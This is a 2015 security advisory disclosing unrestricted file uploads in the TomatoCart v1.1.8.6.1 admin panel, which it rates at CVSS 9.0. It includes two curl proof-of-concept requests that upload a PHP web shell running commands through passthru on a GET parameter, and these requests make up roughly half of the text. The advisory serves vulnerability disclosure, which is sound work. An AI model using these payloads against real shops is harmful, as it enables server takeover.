TomatoCart v1.1.8.6.1: Code Execution

TomatoCart v1.1.8.6.1: Code Execution

Date: 2015-11-13 11:34:03
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: TomatoCart v1.1.8.6.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@tomatocart.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of curesec GmbH

2. Overview

TomatoCart has multiple locations where the upload of images is allowed. In two of these locations, the file type and extension of the uploaded file are not checked, which leads to code execution.

Please note that an admin account with at least some privileges is required to exploit this issue.

3. Code Execution 1

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a new slide image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution.

The rights needed are Content -> Slide Images.

Proof of Concept

curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=--------1106460043' \ -b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"image1\"; filename=\"test2.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"module\"\x0d\x0a\x0d\x0aslide_images\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0asave_slide_images\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"token\"\x0d\x0a\x0d\x0a0842b57bd667e448f494c7f6c268d4f3\x0d\x0a----------1106460043--\x0d\x0a' \ 'http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php'

3. Code Execution 2

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a new product image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution.

The rights needed are Content -> Products.

Proof of Concept

curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=--------1775010584' \ -b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"APC_UPLOAD_PROGRESS\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"UPLOAD_IDENTIFIER\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a4194304\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"ext-gen4881\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"path\"\x0d\x0a\x0d\x0a\x0d\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"cmd\"\x0d\x0a\x0d\x0aupload\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"dir\"\x0d\x0a\x0d\x0a.\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"token\"\x0d\x0a\x0d\x0a0842b57bd667e448f494c7f6c268d4f3\x0d\x0a----------1775010584--\x0d\x0a' \ 'http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php?module=products&action=upload_image'

5. Solution

This issue has not been fixed by the vendor

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public